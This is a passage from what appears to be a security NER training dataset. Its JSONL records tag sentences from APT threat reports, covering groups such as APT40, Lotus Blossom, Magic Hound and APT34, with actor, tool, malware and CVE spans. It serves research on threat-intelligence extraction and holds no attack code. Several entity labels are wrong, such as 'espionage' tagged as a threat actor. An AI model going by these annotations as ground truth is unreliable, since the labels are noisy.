"dnrti_train_000716", "source": "dnrti_train"}} {"text": "The Leviathan , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 .", "spans": {"THREAT_ACTOR: Leviathan": [[4, 13]]}, "info": {"id": "dnrti_train_000717", "source": "dnrti_train"}} {"text": "This actor , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 .", "spans": {"THREAT_ACTOR: actor": [[5, 10]]}, "info": {"id": "dnrti_train_000718", "source": "dnrti_train"}} {"text": "The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013 , dubbed TEMP.Periscope .", "spans": {"THREAT_ACTOR: group": [[28, 33]], "THREAT_ACTOR: cyber espionage actors": [[55, 77]], "THREAT_ACTOR: TEMP.Periscope": [[114, 128]]}, "info": {"id": "dnrti_train_000719", "source": "dnrti_train"}} 
{"text": "The current campaign is a sharp escalation of detected activity since summer 2017 .", "spans": {}, "info": {"id": "dnrti_train_000721", "source": "dnrti_train"}} {"text": "Since early 2018 , FireEye ( including our FireEye as a Service ( FaaS ) , Mandiant Consulting , and iSIGHT Intelligence teams ) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities , especially those connected to South China Sea issues .", "spans": {"ORGANIZATION: FireEye": [[19, 26], [43, 50]], "ORGANIZATION: Mandiant Consulting": [[75, 94]], "ORGANIZATION: iSIGHT Intelligence": [[101, 120]], "ORGANIZATION: maritime entities": [[203, 220]]}, "info": {"id": "dnrti_train_000722", "source": "dnrti_train"}} {"text": "Known targets of the Leviathan have been involved in the maritime industry , and research institutes , academic organizations , and private firms in the United States .", "spans": {"THREAT_ACTOR: Leviathan": [[21, 30]], "ORGANIZATION: research institutes": [[81, 100]], "ORGANIZATION: academic organizations": [[103, 125]], "ORGANIZATION: private firms": [[132, 145]]}, "info": {"id": "dnrti_train_000723", "source": "dnrti_train"}} {"text": "Active since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities .", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[29, 43]], "ORGANIZATION: engineering firms": [[132, 149]], "ORGANIZATION: government offices": [[208, 226]]}, "info": {"id": "dnrti_train_000724", "source": "dnrti_train"}} {"text": "TEMP.Periscope overlaps in targeting , as well as tactics , techniques , and procedures ( TTPs ) , with TEMP.Jumper , a group that also overlaps significantly with public reporting on NanHaiShu .", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[0, 14]], "THREAT_ACTOR: TEMP.Jumper": [[104, 115]], "THREAT_ACTOR: group": [[120, 
125]], "TOOL: NanHaiShu": [[184, 193]]}, "info": {"id": "dnrti_train_000725", "source": "dnrti_train"}} {"text": "The actor has conducted operations since at least 2013 in support of China 's naval modernization effort .", "spans": {"THREAT_ACTOR: actor": [[4, 9]]}, "info": {"id": "dnrti_train_000726", "source": "dnrti_train"}} {"text": "FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: actor": [[155, 160]], "THREAT_ACTOR: APT40": [[169, 174]]}, "info": {"id": "dnrti_train_000727", "source": "dnrti_train"}} {"text": "The Leviathan group has specifically targeted engineering , transportation , and the defense industry , especially where these sectors overlap with maritime technologies .", "spans": {"THREAT_ACTOR: Leviathan group": [[4, 19]]}, "info": {"id": "dnrti_train_000728", "source": "dnrti_train"}} {"text": "We believe APT40 's emphasis on maritime issues and naval technology ultimately support China 's ambition to establish a blue-water navy .", "spans": {"THREAT_ACTOR: APT40": [[11, 16]]}, "info": {"id": "dnrti_train_000729", "source": "dnrti_train"}} {"text": "Within a year APT40 was observed masquerading as a UUV manufacturer , and targeting universities engaged in naval research .", "spans": {"THREAT_ACTOR: APT40": [[14, 19]]}, "info": {"id": "dnrti_train_000730", "source": "dnrti_train"}} {"text": "APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia .", "spans": {"THREAT_ACTOR: APT40": [[0, 5]]}, "info": {"id": "dnrti_train_000731", "source": "dnrti_train"}} {"text": "We assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation .", "spans": {"THREAT_ACTOR: APT40": [[40, 45]]}, "info": {"id": "dnrti_train_000732", "source": 
"dnrti_train"}} {"text": "The actor 's targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China .", "spans": {"THREAT_ACTOR: actor": [[4, 9], [124, 129]]}, "info": {"id": "dnrti_train_000733", "source": "dnrti_train"}} {"text": "Analysis of the operational times of the group 's activities indicates that it is probably centered around China Standard Time ( UTC +8 ) .", "spans": {"THREAT_ACTOR: group": [[41, 46]]}, "info": {"id": "dnrti_train_000734", "source": "dnrti_train"}} {"text": "APT40 relies heavily on web shells for an initial foothold into an organization .", "spans": {"THREAT_ACTOR: APT40": [[0, 5]], "TOOL: web shells": [[24, 34]]}, "info": {"id": "dnrti_train_000735", "source": "dnrti_train"}} {"text": "APT40 has been observed leveraging a variety of techniques for initial compromise , including web server exploitation , phishing campaigns delivering publicly available and custom backdoors , and strategic web compromises .", "spans": {"THREAT_ACTOR: APT40": [[0, 5]]}, "info": {"id": "dnrti_train_000736", "source": "dnrti_train"}} {"text": "Depending on placement , a web shell can provide continued access to victims ' environments , re-infect victim systems , and facilitate lateral movement .", "spans": {}, "info": {"id": "dnrti_train_000737", "source": "dnrti_train"}} {"text": "The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: CVE-2012-0158": [[59, 72]]}, "info": {"id": "dnrti_train_000738", "source": "dnrti_train"}} {"text": "A paper released today by our colleagues at Palo Alto Networks presented a portion of data on this crew under the label \" the Lotus Blossom Operation \" , likely named for the debug string present in much of the \" Elise \" codebase since at least 2012 : \" d:\\lstudio\\projects\\lotus\\… \" .", "spans": {"ORGANIZATION: Palo Alto 
Networks": [[44, 62]], "TOOL: Elise": [[213, 218]]}, "info": {"id": "dnrti_train_000739", "source": "dnrti_train"}} {"text": "The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: PDF exploits": [[41, 53]], "VULNERABILITY: Adobe Flash Player exploits": [[56, 83]], "VULNERABILITY: CVE-2012-0158": [[101, 114]], "VULNERABILITY: Word exploits": [[115, 128]], "TOOL: Tran Duy Linh": [[175, 188]]}, "info": {"id": "dnrti_train_000741", "source": "dnrti_train"}} {"text": "The Spring Dragon appears to have rolled out a steady mix of exploits against government-related organizations in VN , TW , PH , and other locations over the past few years .", "spans": {"THREAT_ACTOR: Spring Dragon": [[4, 17]], "ORGANIZATION: government-related organizations": [[78, 110]]}, "info": {"id": "dnrti_train_000742", "source": "dnrti_train"}} {"text": "Organizations located in Myanmar and targeted by Spring Dragon have gone unmentioned .", "spans": {"THREAT_ACTOR: Spring Dragon": [[49, 62]]}, "info": {"id": "dnrti_train_000743", "source": "dnrti_train"}} {"text": "Spring Dragon 's infiltration techniques there were not simply spearphish .", "spans": {"THREAT_ACTOR: Spring Dragon": [[0, 13]]}, "info": {"id": "dnrti_train_000744", "source": "dnrti_train"}} {"text": "The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) .", "spans": {"MALWARE: Zawgyi_Keyboard_L.zip": [[24, 45]], "MALWARE: setup.exe": [[69, 78]], "TOOL: Elise": [[139, 144]], "MALWARE: wincex.dll": [[147, 157]]}, "info": {"id": "dnrti_train_000745", "source": "dnrti_train"}} {"text": "While this particular actor effectively used their almost worn 
out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well .", "spans": {"THREAT_ACTOR: actor": [[22, 27]], "VULNERABILITY: CVE-2012-0158": [[67, 80]], "THREAT_ACTOR: Spring Dragon": [[104, 117]]}, "info": {"id": "dnrti_train_000746", "source": "dnrti_train"}} {"text": "The well-known threat group called DRAGONFISH or Lotus Blossom are distributing a new form of Elise malware targeting organizations for espionage purposes .", "spans": {"THREAT_ACTOR: threat group": [[15, 27]], "THREAT_ACTOR: DRAGONFISH": [[35, 45]], "THREAT_ACTOR: Lotus Blossom": [[49, 62]], "TOOL: Elise malware": [[94, 107]], "THREAT_ACTOR: espionage": [[136, 145]]}, "info": {"id": "dnrti_train_000747", "source": "dnrti_train"}} {"text": "The threat actors associated with DRAGONFISH have previously focused their campaigns on targets in Southeast Asia , specifically those located in countries near the South China Sea .", "spans": {"THREAT_ACTOR: threat actors": [[4, 17]], "THREAT_ACTOR: DRAGONFISH": [[34, 44]]}, "info": {"id": "dnrti_train_000748", "source": "dnrti_train"}} {"text": "iDefense analysts have identified a campaign likely to be targeting members of— or those with affiliation or interest in—the ASEAN Defence Ministers ' Meeting ( ADMM ) .", "spans": {"ORGANIZATION: iDefense": [[0, 8]], "ORGANIZATION: Defence Ministers ' Meeting": [[131, 158]], "ORGANIZATION: ADMM": [[161, 165]]}, "info": {"id": "dnrti_train_000749", "source": "dnrti_train"}} {"text": "iDefense analysts have identified a campaign likely to be targeting members of or those with affiliation or interest in the ASEAN Defence Minister 's Meeting ( ADMM ) .", "spans": {"ORGANIZATION: iDefense": [[0, 8]], "ORGANIZATION: ASEAN Defence Minister 's Meeting": [[124, 157]], "ORGANIZATION: ADMM": [[160, 164]]}, "info": {"id": "dnrti_train_000750", "source": "dnrti_train"}} {"text": "iDefense assesses with high confidence that this campaign is associated with the threat group 
DRAGONFISH ( also known as Lotus Blossom and Spring Dragon ) .", "spans": {"ORGANIZATION: iDefense": [[0, 8]], "THREAT_ACTOR: threat group": [[81, 93]], "THREAT_ACTOR: DRAGONFISH": [[94, 104]], "THREAT_ACTOR: Lotus Blossom": [[121, 134]], "THREAT_ACTOR: Spring Dragon": [[139, 152]]}, "info": {"id": "dnrti_train_000751", "source": "dnrti_train"}} {"text": "To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability .", "spans": {"VULNERABILITY: CVE-2017-11882": [[239, 253]]}, "info": {"id": "dnrti_train_000752", "source": "dnrti_train"}} {"text": "The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign .", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "VULNERABILITY: CVE-2014-6332": [[32, 45]], "TOOL: Emissary": [[144, 152]]}, "info": {"id": "dnrti_train_000753", "source": "dnrti_train"}} {"text": "The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan .", "spans": {"ORGANIZATION: individual": [[22, 32]], "THREAT_ACTOR: actors": [[46, 52]]}, "info": {"id": "dnrti_train_000754", "source": "dnrti_train"}} {"text": "Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[0, 13]], "VULNERABILITY: CVE-2014-6332": [[35, 48]]}, "info": {"id": "dnrti_train_000758", "source": "dnrti_train"}} {"text": "This Trojan is related to the Elise backdoor described in the Operation Lotus Blossom report .", "spans": {"TOOL: Elise backdoor": [[30, 44]]}, "info": {"id": "dnrti_train_000759", "source": "dnrti_train"}} 
{"text": "Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[0, 13]], "VULNERABILITY: CVE-2014-6332": [[40, 53]], "TOOL: Emissary Trojan": [[86, 101]]}, "info": {"id": "dnrti_train_000760", "source": "dnrti_train"}} {"text": "APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan .", "spans": {"THREAT_ACTOR: APT threat actors": [[0, 17]], "ORGANIZATION: diplomat": [[68, 76]]}, "info": {"id": "dnrti_train_000761", "source": "dnrti_train"}} {"text": "Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure .", "spans": {"ORGANIZATION: French diplomat": [[34, 49]], "THREAT_ACTOR: actors": [[115, 121]]}, "info": {"id": "dnrti_train_000762", "source": "dnrti_train"}} {"text": "The Elise malware used by Lotus Blossom , which was an attack campaign on targets in Southeast Asia .", "spans": {"TOOL: Elise malware": [[4, 17]], "THREAT_ACTOR: Lotus Blossom": [[26, 39]]}, "info": {"id": "dnrti_train_000763", "source": "dnrti_train"}} {"text": "Based on the targeting and lures , Unit 42 assesses that the Lotus Blossom actors ' collection requirements include militaries and government agencies in Southeast Asia .", "spans": {"ORGANIZATION: Unit 42": [[35, 42]], "THREAT_ACTOR: Lotus Blossom actors": [[61, 81]], "ORGANIZATION: government agencies": [[131, 150]]}, "info": {"id": "dnrti_train_000764", "source": "dnrti_train"}} {"text": "In December 2015 , Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a payload .", "spans": {"ORGANIZATION: Unit 42": [[19, 26]], "TOOL: Emissary Trojan": [[85, 100]]}, "info": {"id": "dnrti_train_000765", "source": "dnrti_train"}} {"text": "The oldest 
sample we found was created in 2009 , indicating this tool has been in use for almost seven years .", "spans": {}, "info": {"id": "dnrti_train_000766", "source": "dnrti_train"}} {"text": "In addition , Emissary appears to against Taiwan or Hong Kong , all of the decoys are written in Traditional Chinese , and they use themes related to the government or military .", "spans": {"TOOL: Emissary": [[14, 22]]}, "info": {"id": "dnrti_train_000767", "source": "dnrti_train"}} {"text": "Of note , this is three years earlier than the oldest Elise sample we have found , suggesting this group has been active longer than previously documented .", "spans": {"TOOL: Elise sample": [[54, 66]], "THREAT_ACTOR: group": [[99, 104]]}, "info": {"id": "dnrti_train_000768", "source": "dnrti_train"}} {"text": "In addition , we observed a TTP shift post publication with regards to their malware delivery ; they started using compromised but legitimate domains to serve their malware .", "spans": {"TOOL: legitimate domains": [[131, 149]]}, "info": {"id": "dnrti_train_000769", "source": "dnrti_train"}} {"text": "All of the Emissary we've collected are written in Traditional Chinese , which is used primarily in Taiwan and Hong Kong .", "spans": {"TOOL: Emissary": [[11, 19]]}, "info": {"id": "dnrti_train_000770", "source": "dnrti_train"}} {"text": "One of the most interesting observations made during this analysis is that the amount of development effort devoted to Emissary significantly increased after we published our Operation Lotus Blossom report in June 2015 , resulting in many new versions of the Emissary Trojan .", "spans": {"TOOL: Emissary": [[119, 127]], "TOOL: Emissary Trojan": [[259, 274]]}, "info": {"id": "dnrti_train_000771", "source": "dnrti_train"}} {"text": "Lotus Blossom targeted the government , higher education , and high tech companies .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[0, 13]], "ORGANIZATION: high tech companies": [[63, 82]]}, "info": {"id": "dnrti_train_000772", 
"source": "dnrti_train"}} {"text": "Our evidence suggests that malware authors created Emissary as early as 2009 , which suggests that threat actors have relied on this tool as a payload in cyber-espionage attacks for many years .", "spans": {"TOOL: Emissary": [[51, 59]], "THREAT_ACTOR: threat actors": [[99, 112]]}, "info": {"id": "dnrti_train_000773", "source": "dnrti_train"}} {"text": "While it lacks more advanced functionality like screen capturing , it is still able to carry out most tasks desired by threat actors : exfiltration of files , ability to download and execute additional payloads , and gain remote shell access .", "spans": {"THREAT_ACTOR: threat actors": [[119, 132]]}, "info": {"id": "dnrti_train_000774", "source": "dnrti_train"}} {"text": "The timeline in Figure 2 shows that the Emissary Trojan was first created ( version 1.0 ) in May 2009 and quickly received an update that resulted in version 1.1 in June 2009 .", "spans": {"TOOL: Emissary Trojan": [[40, 55]]}, "info": {"id": "dnrti_train_000775", "source": "dnrti_train"}} {"text": "Between August and November 2015 the malware author creates several new versions of Emissary , specifically 5.0 , 5.1 , 5.3 and 5.4 in a much more rapid succession compared to development process in earlier versions .", "spans": {"TOOL: Emissary": [[84, 92]]}, "info": {"id": "dnrti_train_000776", "source": "dnrti_train"}} {"text": "Version 2.0 received one update in October 2013 before the malware author released version 3.0 in December 2014 .", "spans": {}, "info": {"id": "dnrti_train_000777", "source": "dnrti_train"}} {"text": "While this may be coincidental , the out-of-sequence version 3.0 sample was created ten days after we published the Operation Lotus Blossom paper that exposed the Elise Trojan that is closely related to Emissary .", "spans": {"TOOL: Elise Trojan": [[163, 175]], "TOOL: Emissary": [[203, 211]]}, "info": {"id": "dnrti_train_000778", "source": "dnrti_train"}} {"text": "The Lotus Blossom largely 
targets military or government , with some cases of higher education and high tech companies .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[4, 17]], "ORGANIZATION: high tech companies": [[99, 118]]}, "info": {"id": "dnrti_train_000779", "source": "dnrti_train"}} {"text": "The use of Emissary appears to be focused only on Taiwan and Hong Kong , with regular malware updates to avoid detection and to increase the odds of success .", "spans": {"TOOL: Emissary": [[11, 19]]}, "info": {"id": "dnrti_train_000780", "source": "dnrti_train"}} {"text": "The Lotus Blossom actors using Emissary have been active for at least seven years in Southeast Asia .", "spans": {"THREAT_ACTOR: Lotus Blossom actors": [[4, 24]], "TOOL: Emissary": [[31, 39]]}, "info": {"id": "dnrti_train_000781", "source": "dnrti_train"}} {"text": "Magic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia .", "spans": {"ORGANIZATION: technology sectors": [[82, 100]]}, "info": {"id": "dnrti_train_000782", "source": "dnrti_train"}} {"text": "Regardless of causation , the rapid development of new versions of Emissary suggests that the malware authors are making frequent modifications to evade detection , which as a corollary suggests the Lotus Blossom are actively using the Emissary Trojan as a payload in attacks .", "spans": {"TOOL: Emissary": [[67, 75]], "THREAT_ACTOR: Lotus Blossom": [[199, 212]], "TOOL: Emissary Trojan": [[236, 251]]}, "info": {"id": "dnrti_train_000783", "source": "dnrti_train"}} {"text": "Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called \" Rocket Kitten \" ( AKA Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish ) as well as an older attack campaign called Newscasters .", "spans": {"THREAT_ACTOR: group": [[119, 124]], "THREAT_ACTOR: Rocket Kitten": [[134, 147]], "THREAT_ACTOR: 
Operation Saffron Rose": [[156, 178]], "THREAT_ACTOR: Ajax Security Team": [[181, 199]], "THREAT_ACTOR: Operation Woolen-Goldfish": [[202, 227]]}, "info": {"id": "dnrti_train_000784", "source": "dnrti_train"}} {"text": "In addition to the malware evolution , the actors also shifted from solely spear-phishing targets with attachments to also compromising legitimate websites to host malware .", "spans": {"THREAT_ACTOR: actors": [[43, 49]]}, "info": {"id": "dnrti_train_000785", "source": "dnrti_train"}} {"text": "It is highly likely the Lotus Blossom used spear-phishing attacks containing links to these malicious documents as a delivery mechanism .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[24, 37]]}, "info": {"id": "dnrti_train_000786", "source": "dnrti_train"}} {"text": "We were ultimately able to identify multiple organizations in the government , energy , and technology sectors targeted by Magic Hound .", "spans": {"ORGANIZATION: technology sectors": [[92, 110]]}, "info": {"id": "dnrti_train_000787", "source": "dnrti_train"}} {"text": "The MPK bot is not publicly available and had previously been attributed to an adversary group called \" Rocket Kitten \" which has often been thought to be a state sponsored adversary operating in the Middle East region .", "spans": {"TOOL: MPK bot": [[4, 11]], "THREAT_ACTOR: group": [[89, 94]], "THREAT_ACTOR: Rocket Kitten": [[104, 117]]}, "info": {"id": "dnrti_train_000789", "source": "dnrti_train"}} {"text": "One payload was a Python based open source remote administration tool ( RAT ) called Pupy .", "spans": {"TOOL: RAT": [[72, 75]], "TOOL: Pupy": [[85, 89]]}, "info": {"id": "dnrti_train_000790", "source": "dnrti_train"}} {"text": "Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES .", "spans": {"TOOL: AES": [[124, 127]]}, "info": {"id": "dnrti_train_000792", "source": "dnrti_train"}} {"text": "The loader 's main goal was to run a PowerShell command 
to execute shellcode .", "spans": {"TOOL: PowerShell command": [[37, 55]]}, "info": {"id": "dnrti_train_000793", "source": "dnrti_train"}} {"text": "To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys .", "spans": {"MALWARE: c:\\temp\\rr.exe": [[54, 68]]}, "info": {"id": "dnrti_train_000794", "source": "dnrti_train"}} {"text": "The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt .", "spans": {"TOOL: custom dropper": [[53, 67]], "MALWARE: MagicHound.DropIt": [[95, 112]]}, "info": {"id": "dnrti_train_000795", "source": "dnrti_train"}} {"text": "We have also seen Magic Hound using DropIt as a binder , specifically dropping a legitimate decoy executable along with the malicious executable onto the target host .", "spans": {"TOOL: DropIt": [[36, 42]]}, "info": {"id": "dnrti_train_000796", "source": "dnrti_train"}} {"text": "We also found a second IRC bot called MPK using the same IP for its C2 server that a Leash sample was hosted on .", "spans": {"TOOL: IRC bot": [[23, 30]], "TOOL: MPK": [[38, 41]], "TOOL: Leash sample": [[85, 97]]}, "info": {"id": "dnrti_train_000797", "source": "dnrti_train"}} {"text": "The Magic Hound attack campaign is an active and persistent espionage motivated adversary operating in the Middle East region .", "spans": {"THREAT_ACTOR: espionage": [[60, 69]]}, "info": {"id": "dnrti_train_000798", "source": "dnrti_train"}} {"text": "Organizations in the government , energy , and technology sectors have been targeted by Magic Hound , specifically organizations based in or doing business in Saudi Arabia .", "spans": {"ORGANIZATION: technology sectors": [[47, 65]]}, "info": {"id": "dnrti_train_000799", "source": "dnrti_train"}} {"text": "At a high level , Retriever is a .NET downloader that downloads secondary payloads from servers associated with Magic Hound .", "spans": {"TOOL: 
Retriever": [[18, 27]], "TOOL: .NET downloader": [[33, 48]]}, "info": {"id": "dnrti_train_000800", "source": "dnrti_train"}} {"text": "For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer .", "spans": {"TOOL: DropIt sample": [[28, 41]], "MALWARE: %TEMP%\\flash_update.exe": [[179, 202]], "TOOL: Flash Player installer": [[227, 249]]}, "info": {"id": "dnrti_train_000801", "source": "dnrti_train"}} {"text": "M-Trends 2018 can arm security teams with the knowledge they need to defend against today 's most often used cyber attacks , as well as lesser seen and emerging threats .", "spans": {"ORGANIZATION: M-Trends": [[0, 8]]}, "info": {"id": "dnrti_train_000802", "source": "dnrti_train"}} {"text": "FireEye tracks thousands of threat actors , but pays special attention to state-sponsored attackers who carry out advanced persistent threat ( APT ) attacks .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: threat actors": [[28, 41]], "THREAT_ACTOR: attackers": [[90, 99]], "THREAT_ACTOR: APT": [[143, 146]]}, "info": {"id": "dnrti_train_000803", "source": "dnrti_train"}} {"text": "Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents .", "spans": {"THREAT_ACTOR: APT32": [[22, 27]], "THREAT_ACTOR: OceanLotus Group": [[48, 64]], "ORGANIZATION: foreign governments": [[131, 150]], "ORGANIZATION: journalists": [[153, 164]], "ORGANIZATION: dissidents": [[182, 192]]}, "info": {"id": "dnrti_train_000804", "source": "dnrti_train"}} {"text": "Evidence also suggests that APT32 has targeted network security and technology infrastructure corporations with connections to foreign investors .", "spans": {"THREAT_ACTOR: APT32": [[28, 33]], 
"ORGANIZATION: technology infrastructure corporations": [[68, 106]]}, "info": {"id": "dnrti_train_000806", "source": "dnrti_train"}} {"text": "Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations foreign governments .", "spans": {"THREAT_ACTOR: APT32": [[22, 27]], "THREAT_ACTOR: OceanLotus Group": [[48, 64]]}, "info": {"id": "dnrti_train_000807", "source": "dnrti_train"}} {"text": "FireEye asesses that APT32 actors may be aligned with the national interests of Vietnam .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT32 actors": [[21, 33]]}, "info": {"id": "dnrti_train_000808", "source": "dnrti_train"}} {"text": "APT32 poses a threat to companies doing business or preparing to invest in Vietnam .", "spans": {"THREAT_ACTOR: APT32": [[0, 5]]}, "info": {"id": "dnrti_train_000809", "source": "dnrti_train"}} {"text": "We believe recent activity targeting private interests in Vietnam suggests that APT32 poses a threat to companies doing business or preparing to invest in the country .", "spans": {"THREAT_ACTOR: APT32": [[80, 85]]}, "info": {"id": "dnrti_train_000810", "source": "dnrti_train"}} {"text": "DROPSHOT is a notable piece of malware used to deliver variants of the TURNEDUP backdoor .", "spans": {"TOOL: DROPSHOT": [[0, 8]], "TOOL: malware": [[31, 38]]}, "info": {"id": "dnrti_train_000811", "source": "dnrti_train"}} {"text": "Additionally , there is evidence to suggest APT33 targeted Saudi Arabia .", "spans": {"THREAT_ACTOR: APT33": [[44, 49]]}, "info": {"id": "dnrti_train_000812", "source": "dnrti_train"}} {"text": "Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets .", "spans": {"THREAT_ACTOR: APT33": [[44, 49]]}, "info": {"id": "dnrti_train_000814", "source": "dnrti_train"}} {"text": "Although we have only observed APT33 use DROPSHOT to deliver TURNEDUP 
, we have identified multiple DROPSHOT samples in the wild that delivered wiper malware we call SHAPESHIFT .", "spans": {"THREAT_ACTOR: APT33": [[31, 36]], "TOOL: DROPSHOT": [[41, 49]], "TOOL: DROPSHOT samples": [[100, 116]], "TOOL: SHAPESHIFT": [[166, 176]]}, "info": {"id": "dnrti_train_000815", "source": "dnrti_train"}} {"text": "The SHAPESHIFT wiper is capable of wiping disks and volumes , as well as deleting files .", "spans": {"TOOL: SHAPESHIFT wiper": [[4, 20]]}, "info": {"id": "dnrti_train_000816", "source": "dnrti_train"}} {"text": "Ties to SHAPESHIFT suggest that APT33 may engage in destructive operations or shares tools or development resources with an Iranian threat group that conducts destructive operations .", "spans": {"TOOL: SHAPESHIFT": [[8, 18]], "THREAT_ACTOR: APT33": [[32, 37]], "THREAT_ACTOR: threat group": [[132, 144]]}, "info": {"id": "dnrti_train_000817", "source": "dnrti_train"}} {"text": "The HTA files contained job descriptions and links to job postings on popular employment websites .", "spans": {"MALWARE: HTA files": [[4, 13]]}, "info": {"id": "dnrti_train_000819", "source": "dnrti_train"}} {"text": "Since at least 2014 , an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran .", "spans": {"THREAT_ACTOR: threat group": [[33, 45]], "ORGANIZATION: FireEye": [[57, 64]], "THREAT_ACTOR: APT34": [[68, 73]]}, "info": {"id": "dnrti_train_000820", "source": "dnrti_train"}} {"text": "The OilRig group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries .", "spans": {"THREAT_ACTOR: OilRig group": [[4, 16]]}, "info": {"id": "dnrti_train_000822", "source": "dnrti_train"}} {"text": "APT34 uses a mix of public and non-public tools .", "spans": {"THREAT_ACTOR: APT34": [[0, 5]], "TOOL: public and non-public tools": [[20, 47]]}, "info": {"id": "dnrti_train_000823", "source": "dnrti_train"}} 
{"text": "In July 2017 , FireEye observed APT34 targeting an organization in the Middle East using the POWRUNER PowerShell-based backdoor and the downloader BONDUPDATER , which includes a domain generation algorithm ( DGA ) for command and control .", "spans": {"ORGANIZATION: FireEye": [[15, 22]], "THREAT_ACTOR: APT34": [[32, 37]], "TOOL: POWRUNER PowerShell-based backdoor": [[93, 127]], "TOOL: BONDUPDATER": [[147, 158]]}, "info": {"id": "dnrti_train_000826", "source": "dnrti_train"}} {"text": "In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": {"THREAT_ACTOR: APT34": [[19, 24]], "VULNERABILITY: Microsoft Office vulnerability": [[39, 69]], "VULNERABILITY: CVE-2017-11882": [[70, 84]], "TOOL: POWRUNER": [[95, 103]], "TOOL: BONDUPDATER": [[108, 119]], "ORGANIZATION: Microsoft": [[143, 152]]}, "info": {"id": "dnrti_train_000828", "source": "dnrti_train"}} {"text": "FireEye has identified APT35 operations dating back to 2014 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT35": [[23, 28]]}, "info": {"id": "dnrti_train_000829", "source": "dnrti_train"}} {"text": "APT35 , also known as the Newscaster Team , is a threat group sponsored by the Iranian government that conducts long term , resource-intensive operations to collect strategic intelligence .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "THREAT_ACTOR: Newscaster Team": [[26, 41]], "THREAT_ACTOR: threat group": [[49, 61]]}, "info": {"id": "dnrti_train_000830", "source": "dnrti_train"}} {"text": "APT35 typically targets military , diplomatic and government , media , energy , engineering , business services and telecommunications sectors in U.S. 
